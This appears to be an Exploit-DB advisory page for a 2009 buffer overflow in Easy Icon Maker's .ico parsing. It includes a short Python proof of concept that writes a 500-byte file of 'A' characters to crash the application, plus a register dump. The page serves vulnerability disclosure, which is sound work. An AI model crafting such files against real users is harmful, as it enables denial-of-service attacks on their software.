Easy Icon Maker .ico File Reading Crash

vendor:

Easy Icon Maker

by:

ItSecTeam

7,8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Easy Icon Maker

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

Easy Icon Maker .ico File Reading Crash

A buffer overflow vulnerability exists in Easy Icon Maker when handling .ico files. An attacker can exploit this vulnerability by creating a malicious .ico file and sending it to the victim, resulting in a crash of the application.

Mitigation:

Update to the latest version of Easy Icon Maker.

Source

Exploit-DB raw data:

#!/usr/bin/python
#
# Easy Icon Maker .ico File Reading Crash
# Homepage: www.icon-maker.com
# #############################################################################
# Credit : ItSecTeam
# mail : Bug@ItSecTeam.com
# Web:  WwW.ITSecTeam.com
# Forum: WwW.forum.itsecteam.com
# Special Tanks : PLATE - M3hr@n.S - B3hz4d - Cdef3nder 
# #############################################################################
# EAX 30303030 ECX 00000000 EDX 00000000 EBX 00000000 ESP 0012F328 EBP 0012F3E4
# ESI 30303028 EDI 00330000 EIP 7C90FF91 ntdll.7C90FF91

try:
	file=open("poc.ico",'w')
	Buff = "\x41" *500
	file.write( Buff )
	file.close()
	print   ("[+] File created successfully: poc.ico" )
except:
	print "[-] Error cant write file to system\n""""